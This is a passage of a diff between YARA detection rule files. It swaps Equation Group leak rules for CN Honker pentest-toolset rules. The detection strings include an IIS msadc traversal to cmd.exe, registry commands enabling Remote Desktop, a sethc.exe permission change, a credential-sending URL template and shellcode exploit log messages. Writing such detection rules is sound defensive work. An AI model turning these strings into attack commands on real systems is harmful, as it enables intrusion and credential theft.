+		id = "77813637-ec9f-599c-90c9-be1dd93b45f7"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1417-L1433"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L2036-L2053"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "34dc21d933d56b6f6c342ca110d9cff7bb51d9fd1b88b359861e5b5650679ad0"
-		score = 75
+		hash = "f4d9b329b45fbcf6a3b9f29f2633d5d3d76c9f9d"
+		logic_hash = "1e268624a5f8df200ef1a03ce167f38feda59836a864e17297473ba223c5895a"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "619944358bc0e1faffd652b6af0600de055c5e7f1f1d91a8051ed9adf5a5b465"
 
 	strings:
-		$s1 = "[-] Failed to mmap file: %s" fullword ascii
-		$s2 = "[-] can not NULL terminate input data" fullword ascii
-		$s3 = "Missing argument for `-x'." fullword ascii
-		$s4 = "[!] Value has size of 0!" fullword ascii
+		$s1 = "\\\\.\\pipe\\WinlogonHack" fullword ascii
+		$s2 = "%s?host=%s&domain=%s&user=%s&pass=%s&port=%u" fullword ascii
+		$s3 = "Global\\WinlogonHack_Load%u" fullword ascii
+		$s4 = "Hookmsgina.dll" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 60KB and 2 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Watcher_Linux_X86_64_V_3_3_0 : FILE
+rule SIGNATURE_BASE_CN_Honker_Sig_3389_Xp3389 : FILE
 {
 	meta:
-		description = "Equation Group hack tool set"
+		description = "Sample from CN Honker Pentest Toolset - file xp3389.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "4077242e-a0f2-54a8-afad-f52b8ed874ba"
-		date = "2017-04-09"
+		id = "75d23c63-ba9e-55fd-90fe-5e054d28a777"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1435-L1450"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L2055-L2071"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "be2ca3791ef1025db6a1dd6bcdf1a9f0b224c3f7585af4546029840251c50094"
-		score = 75
+		hash = "d776eb7596803b5b94098334657667d34b60d880"
+		logic_hash = "7fd7947a802a65dfd63ece3fc6eaf2da8207e99276a9f6b1ff2c937cf4327945"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "a8d65593f6296d6d06230bcede53b9152842f1eee56a2a72b0a88c4f463a09c3"
 
 	strings:
-		$s1 = "forceprismheader" fullword ascii
-		$s2 = "invalid option `" fullword ascii
-		$s3 = "forceprism" fullword ascii
+		$s1 = "echo \"fdenytsconnections\"=dword:00000000 >> c:\\reg.reg" fullword ascii
+		$s2 = "echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server] >" ascii
+		$s3 = "echo \"Tsenabled\"=dword:00000001 >> c:\\reg.reg" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 900KB and all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 20KB and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Linux_Exactchange : FILE
+rule SIGNATURE_BASE_CN_Honker_Cookiesview : FILE
 {
 	meta:
-		description = "Equation Group hack tool set"
+		description = "Sample from CN Honker Pentest Toolset - file CookiesView.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "cd9487be-57c5-5352-bce7-f9510166182d"
-		date = "2017-04-09"
+		id = "71a43797-4b5b-5f87-a70e-ebabc00d9319"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1452-L1472"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L2073-L2089"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "a0bcf5aa1f434fe9698a7408df68870d4908cdf87f22bb4acfedc50bb2c8f11f"
-		score = 75
+		hash = "c54e1f16d79066edfa0f84e920ed1f4873958755"
+		logic_hash = "9711bb15f08c18ba068325d1cca0ded8e252ded4ceddfb134d1317ad8a19fbe8"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "dfecaf5b85309de637b84a686dd5d2fca9c429e8285b7147ae4213c1f49d39e6"
-		hash2 = "6ef6b7ec1f1271503957cf10bb6b1bfcedb872d2de3649f225cf1d22da658bec"
-		hash3 = "39d4f83c7e64f5b89df9851bdba917cf73a3449920a6925b6cd379f2fdec2a8b"
-		hash4 = "15e12c1c27304e4a68a268e392be4972f7c6edf3d4d387e5b7d2ed77a5b43c2c"
 
 	strings:
-		$x1 = "[+] looking for vulnerable socket" fullword ascii
-		$x2 = "can't use 32-bit exploit on 64-bit target" fullword ascii
-		$x3 = "[+] %s socket ready, exploiting..." fullword ascii
-		$x4 = "[!] nothing looks vulnerable, trying everything" fullword ascii
+		$s0 = "V1.0  Http://www.darkst.com Code:New4" fullword ascii
+		$s1 = "maotpo@126.com" fullword ascii
+		$s2 = "www.baidu.com" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 2000KB and 1 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 640KB and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_X86_Linux_Exactchange : FILE
+rule SIGNATURE_BASE_CN_Honker_T00Ls_Lpk_Sethc_V4_LPK : FILE
 {
 	meta:
-		description = "Equation Group hack tool set"
+		description = "Sample from CN Honker Pentest Toolset - file LPK.DAT"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b39e0c6e-b427-5085-99f8-88b2e00bb110"
-		date = "2017-04-09"
+		id = "808f5de2-1360-521e-8939-b759e361507c"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1474-L1490"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L2091-L2108"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "9365eb74a364eb83150672919ea1abe635465fe3239fff26ba91037c74971466"
-		score = 75
+		hash = "2b2ab50753006f62965bba83460e3960ca7e1926"
+		logic_hash = "a7382d61b53706ad51b36bc686a1c3f0018ee111bdc8ae9b05af144230dfbba3"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "dfecaf5b85309de637b84a686dd5d2fca9c429e8285b7147ae4213c1f49d39e6"
-		hash2 = "6ef6b7ec1f1271503957cf10bb6b1bfcedb872d2de3649f225cf1d22da658bec"
 
 	strings:
-		$x1 = "kernel has 4G/4G split, not exploitable" fullword ascii
-		$x2 = "[+] kernel stack size is %d" fullword ascii
+		$s1 = "http://127.0.0.1/1.exe" fullword wide
+		$s2 = "FreeHostKillexe.exe" fullword ascii
+		$s3 = "\\sethc.exe /G everyone:F" ascii
+		$s4 = "c:\\1.exe" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 1000KB and 1 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and 1 of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Eclipsedwing_Rpcproxy_Pcdlllauncher : FILE
+rule SIGNATURE_BASE_CN_Honker_Scanhistory : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "Sample from CN Honker Pentest Toolset - file ScanHistory.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "8dd15424-e1b5-5543-97d5-3b3a83faa428"
-		date = "2017-04-15"
+		id = "85585cd2-c5ed-5465-bcac-b61211570055"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1502-L1519"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L2110-L2126"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "8a01ea872c161521301182b922ece893f9ad1a33d902ec94963946f3b07d7266"
-		score = 75
+		hash = "14c31e238924ba3abc007dc5a3168b64d7b7de8d"
+		logic_hash = "657a25b5103799446fa88abda39d36a05e080c18d41e9dd98199b506f2bfc419"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "48251fb89c510fb3efa14c4b5b546fbde918ed8bb25f041a801e3874bd4f60f8"
-		hash2 = "237c22f4d43fdacfcbd6e1b5f1c71578279b7b06ea8e512b4b6b50f10e8ccf10"
-		hash3 = "79a584c127ac6a5e96f02a9c5288043ceb7445de2840b608fc99b55cf86507ed"
 
 	strings:
-		$x1 = "[-] Failed to Prepare Payload!" fullword ascii
-		$x2 = "ShellcodeStartOffset" fullword ascii
-		$x3 = "[*] Waiting for AuthCode from exploit" fullword ascii
+		$s1 = "ScanHistory.exe" fullword wide
+		$s2 = ".\\Report.dat" fullword wide
+		$s3 = "select  * from  Results order by scandate desc" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 100KB and 1 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Explodingcantouch_1_2_1 : FILE
+rule SIGNATURE_BASE_CN_Honker_Invasionerasor : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "Sample from CN Honker Pentest Toolset - file InvasionErasor.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "66a09bfc-992d-5152-9fd6-9d7bcfb8b92f"
-		date = "2017-04-15"
+		id = "03ccb643-9f92-5278-a358-65f56cf19ccc"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1521-L1536"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L2128-L2146"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "9239a61e71c86fc239f75baa9c781da18553e3c502495ad7429eaf3c744e870c"
-		score = 75
+		hash = "b37ecd9ee6b137a29c9b9d2801473a521b168794"
+		logic_hash = "d2f742693682e9409284706a3eb63536a576cb162629bf76bfabf2e0210984a3"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "0cdde7472b077610d0068aa7e9035da89fe5d435549749707cae24495c8d8444"
 
 	strings:
-		$x1 = "[-] Connection closed by remote host (TCP Ack/Fin)" fullword ascii
-		$s2 = "[!]Warning: Error on first request - path size may actually be larger than indicated." fullword ascii
-		$s4 = "<http://%s/%s> (Not <locktoken:write1>) <http://%s/>" fullword ascii
+		$s1 = "c:\\windows\\system32\\config\\*.*" fullword wide
+		$s2 = "c:\\winnt\\*.txt" fullword wide
+		$s3 = "Command1" fullword ascii
+		$s4 = "Win2003" fullword ascii
+		$s5 = "Win 2000" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 150KB and 1 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 60KB and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Architouch_1_0_0 : FILE
+rule SIGNATURE_BASE_CN_Honker_Super_Injection1 : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "Sample from CN Honker Pentest Toolset - file super Injection1.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c5af05b5-9dfa-535f-b9ea-c82ef79bae7e"
-		date = "2017-04-15"
+		id = "ad84c5a0-4f03-5040-bdf7-819b40a08ad2"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1538-L1551"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L2148-L2164"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "cb6959b7b50e6f2895bab5f3355bef836c9a9774285cfb5fea339ce3d2c67f73"
-		score = 75
+		hash = "8ff2df40c461f6c42b92b86095296187f2b59b14"
+		logic_hash = "11a3628b7c34a34dc37604430195e24063d3f0dd0889d6d782ce0ee42cafbb02"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "444979a2387530c8fbbc5ddb075b15d6a4717c3435859955f37ebc0f40a4addc"
 
 	strings:
-		$s1 = "[+] Target is %s" fullword ascii
+		$s2 = "Invalid owner=This control requires version 4.70 or greater of COMCTL32.DLL" fullword wide
+		$s3 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" fullword ascii
+		$s4 = "ScanInject.log" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Erraticgopher_1_0_1 : FILE
+rule SIGNATURE_BASE_CN_Honker_Pk_Pker : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "Sample from CN Honker Pentest Toolset - file Pker.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "1a3fe877-b9ae-50e4-bb1a-c9dcd4d4a657"
-		date = "2017-04-15"
+		id = "dff0e4fb-6b2e-5fa8-910d-63a9e5030b95"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1553-L1569"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L2166-L2186"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "6b099bd202a962e64cb4f417eb7e09893b869e950eb0740394d222e8b4b89283"
-		score = 75
+		hash = "631787f27f27c46f79e58e1accfcc9ecfb4d3a2f"
+		logic_hash = "ea29bc82131751f0aaa4f10cc7576a27d243fb7dade03db7ae3dcb029b306505"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "3d11fe89ffa14f267391bc539e6808d600e465955ddb854201a1f31a9ded4052"
 
 	strings:
-		$x1 = "[-] Error appending shellcode buffer" fullword ascii
-		$x2 = "[-] Shellcode is too big" fullword ascii
-		$x3 = "[+] Exploit Payload Sent!" fullword ascii
-		$x4 = "[+] Bound to Dimsvc, sending exploit request to opnum 29" fullword ascii
+		$s1 = "/msadc/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe" fullword wide
+		$s2 = "msadc/..\\..\\..\\..\\winnt/system32/cmd.exe" fullword wide
+		$s3 = "--Made by VerKey&Only_Guest&Bincker" fullword wide
+		$s4 = ";APPLET;EMBED;FRAMESET;HEAD;NOFRAMES;NOSCRIPT;OBJECT;SCRIPT;STYLE;" fullword wide
+		$s5 = " --Welcome to Www.Pker.In Made by V.K" fullword wide
+		$s6 = "Report.dat" fullword wide
+		$s7 = ".\\Report.dat" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 150KB and 1 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 500KB and 5 of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Esteemaudit_2_1_0 : FILE
+rule SIGNATURE_BASE_CN_Honker_Getpass_Getpass : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "Sample from CN Honker Pentest Toolset - file GetPass.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "95594756-1872-5d86-877f-0977bd3c067b"
-		date = "2017-04-15"
+		id = "999d0ac0-a112-53db-9dbe-10fa4419cfae"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1571-L1585"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L2188-L2204"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "272d435758c0021bfd84d84c00eb05ece2461a39d092693b61d362365ab098cd"
-		score = 75
+		hash = "d18d952b24110b83abd17e042f9deee679de6a1a"
+		logic_hash = "90d802da512f5d460eda6d644660711601d361e2402522d085d3225931a3fca3"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "61f98b12c52739647326e219a1cf99b5440ca56db3b6177ea9db4e3b853c6ea6"
 
 	strings:
-		$x1 = "[+] Connected to target %s:%d" fullword ascii
-		$x2 = "[-] build_exploit_run_x64():" fullword ascii
+		$s1 = "\\only\\Desktop\\" ascii
+		$s2 = "To Run As Administuor" ascii
+		$s3 = "Key to EXIT ... & pause > nul" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 1 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Darkpulsar_1_1_0 : FILE
+rule SIGNATURE_BASE_CN_Honker_F4Ck_Team_Blackmoon_Jun15 : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "Sample from CN Honker Pentest Toolset - file f4ck.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "0f4f77d7-99bc-5c84-84bf-877c4e79c9f0"
-		date = "2017-04-15"
+		id = "df12daca-8e03-5382-b71d-96a747d3a043"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1587-L1601"
+		old_rule_name = "CN_Honker_F4ck_Team_f4ck_3"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L2206-L2227"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "da8e1723da9e2d9955a3042bceb313d7d10903bfc078ba090c1c5a57be243b96"
-		score = 75
+		hash = "7e3bf9b26df08cfa10f10e2283c6f21f5a3a0014"
+		logic_hash = "85db31c6bca6e5ddd45168a3adbc382d5a9e8128e0b2a6ed5efe1a2fcd42ff3d"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "b439ed18262aec387984184e86bfdb31ca501172b1c066398f8c56d128ba855a"
 
 	strings:
-		$x1 = "[%s] - Error upgraded DLL architecture does not match target architecture (0x%x)" fullword ascii
-		$x2 = "[%s] - Error building DLL loading shellcode" fullword ascii
+		$s1 = "File UserName PassWord [comment] /add" fullword ascii
+		$s2 = "No Net.exe Add User" fullword ascii
+		$s3 = "BlackMoon RunTime Error:" fullword ascii
+		$s4 = "Team.F4ck.Net" fullword wide
+		$s5 = "admin 123456789" fullword ascii
+		$s6 = "blackmoon" fullword ascii
+		$s7 = "f4ck Team" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and 4 of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Educatedscholar_1_0_0 : FILE
+rule SIGNATURE_BASE_CN_Honker_F4Ck_Team_F4Ck_3 : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "Sample from CN Honker Pentest Toolset - file F4ck_3.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "37ca8de5-435b-5c1a-83b8-5704fa137604"
-		date = "2017-04-15"
+		id = "1767669f-47d0-5d6e-97a5-92522f988102"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1603-L1617"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L2229-L2248"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "0265ce5dfb5697a0610a6023b75f6e3ef2ef0308f639978a8617337df2e16c77"
-		score = 75
+		hash = "0b3e9381930f02e170e484f12233bbeb556f3731"
+		logic_hash = "870d22be85da127b3ebfd3f8ec547b6ad1cdc8048b56aea494e8d2643bd61d77"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "4cce9e39c376f67c16df3bcd69efd9b7472c3b478e2e5ef347e1410f1105c38d"
 
 	strings:
-		$x1 = "[+] Shellcode Callback %s:%d" fullword ascii
-		$x2 = "[+] Exploiting Target" fullword ascii
+		$s1 = "F4ck.exe" fullword wide
+		$s2 = "@Netapi32.dll" fullword ascii
+		$s3 = "Team.F4ck.Net" fullword wide
+		$s6 = "NO Net Add User" fullword wide
+		$s7 = "DLL ERROR" fullword ascii
+		$s11 = "F4ck Team" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 150KB and 1 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and 3 of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Doublepulsar_1_3_1 : FILE
+rule SIGNATURE_BASE_CN_Honker_ACCESS_Brute : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "Sample from CN Honker Pentest Toolset - file ACCESS_brute.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "99711157-58eb-5ec0-bb9f-bf953cd10125"
-		date = "2017-04-15"
+		id = "7ceaea93-4f23-50a3-ab39-8149b10ffdad"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1619-L1634"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L2250-L2268"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "1b7ed9dbd4312541bd4d939602f63ce1d909729cce1845b018be6a07a9cb7fe2"
-		score = 75
+		hash = "f552e05facbeb21cb12f23c34bb1881c43e24c34"
+		logic_hash = "5bd0cbb1c2f5863ef1365dc115c736ade05c290cd6fa09a24c2d344314b522cb"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "15ffbb8d382cd2ff7b0bd4c87a7c0bffd1541c2fe86865af445123bc0b770d13"
 
 	strings:
-		$x1 = "[+] Ping returned Target architecture: %s - XOR Key: 0x%08X" fullword ascii
-		$x2 = "[.] Sending shellcode to inject DLL" fullword ascii
-		$x3 = "[-] Error setting ShellcodeFile name" fullword ascii
+		$s1 = ".dns166.co" ascii
+		$s2 = "SExecuteA" ascii
+		$s3 = "ality/clsCom" ascii
+		$s4 = "NT_SINK_AddRef" ascii
+		$s5 = "WINDOWS\\Syswm" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 100KB and 1 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 20KB and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Erraticgophertouch_1_0_1 : FILE
+rule SIGNATURE_BASE_CN_Honker_Fpipe_Fpipe : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "Sample from CN Honker Pentest Toolset - file FPipe.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9f03a4b6-69ab-5cef-876c-1e86ef2afe10"
-		date = "2017-04-15"
+		id = "0d84aa8f-dc15-5bb7-a568-224c6a837685"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1636-L1651"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L2270-L2286"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "08646f7887daddd8efac875bc7b111df7a52feae0a4b81bfd2d2ae7ef9453b5e"
-		score = 75
+		hash = "a2c51c6fa93a3dfa14aaf31fb1c48a3a66a32d11"
+		logic_hash = "bde46f2508dc82f91e39cc7bd88960e836522b068546ce65ebc07db69b3d4493"
+		score = 50
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "729eacf20fe71bd74e57a6b829b45113c5d45003933118b53835779f0b049bad"
 
 	strings:
-		$x1 = "[-] Unable to connect to broswer named pipe, target is NOT vulnerable" fullword ascii
-		$x2 = "[-] Unable to bind to Dimsvc RPC syntax, target is NOT vulnerable" fullword ascii
-		$x3 = "[+] Bound to Dimsvc, target IS vulnerable" fullword ascii
+		$s1 = "Unable to create TCP listen socket. %s%d" fullword ascii
+		$s2 = "http://www.foundstone.com" fullword ascii
+		$s3 = "%s %s port %d. Address is already in use" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 30KB and 1 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 20KB and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Smbtouch_1_1_1 : FILE
